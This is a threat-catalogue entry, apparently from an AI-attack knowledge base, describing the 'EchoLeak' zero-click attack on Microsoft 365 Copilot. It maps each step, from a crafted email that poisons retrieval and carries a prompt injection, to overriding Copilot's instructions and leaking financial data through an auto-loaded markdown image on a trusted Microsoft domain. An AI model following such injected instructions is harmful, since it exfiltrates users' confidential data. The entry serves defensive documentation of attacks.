EchoLeak: Zero-Click Data Exfiltration using M365 Copilot

Type: procedure

Description: An adversary exploits a zero-click vulnerability in Microsoft 365 Copilot by sending a specially crafted email containing a prompt injection disguised as user instructions. When a user asks Copilot to summarize the latest earning reports, the malicious email is fetched along with the legitimate earning reports. The instructions in the malicious email cause Copilot to embed sensitive financial data within a markdown-formatted image, which is then returned to the user and loaded automatically without any further interaction. The attack also leverages trusted Microsoft domains to facilitate the data exfiltration.

Version: 0.1.0

Created At: 2025-06-19 08:13:23 -0400

Last Modified At: 2025-06-19 08:13:23 -0400

External References

Techniques

TacticTechniqueDetails
Resource DevelopmentRetrieval Content CraftingAn attacker crafts an email which would be retrieved by M365 Copilot when asked about the latest earning reports.
Resource DevelopmentAcquire InfrastructureAn attacker sets up an Azure tenant to host an endpoint which will be used to exfiltrate data.
Initial AccessRAG PoisoningAn attacker sends a malicious email which gets indexed into the RAG system of M365 Copilot.
ExecutionLLM Prompt InjectionThe malicious email contains a prompt injection disguised as legitimate instructions for the email recipient.
Privilege EscalationLLM JailbreakThe exploit circumvents copilot's system instructions and provides new ones that specify copilot to embed sensitive data into a markdown image and return it to the user.
Defense EvasionAbuse Trusted SitesThe attacker exfiltrates data through a malicious, yet trusted, teams.microsoft.com endpoint
ExfiltrationImage RenderingThe attack uses image rendering to exfiltrate sensitive data without requiring user interaction.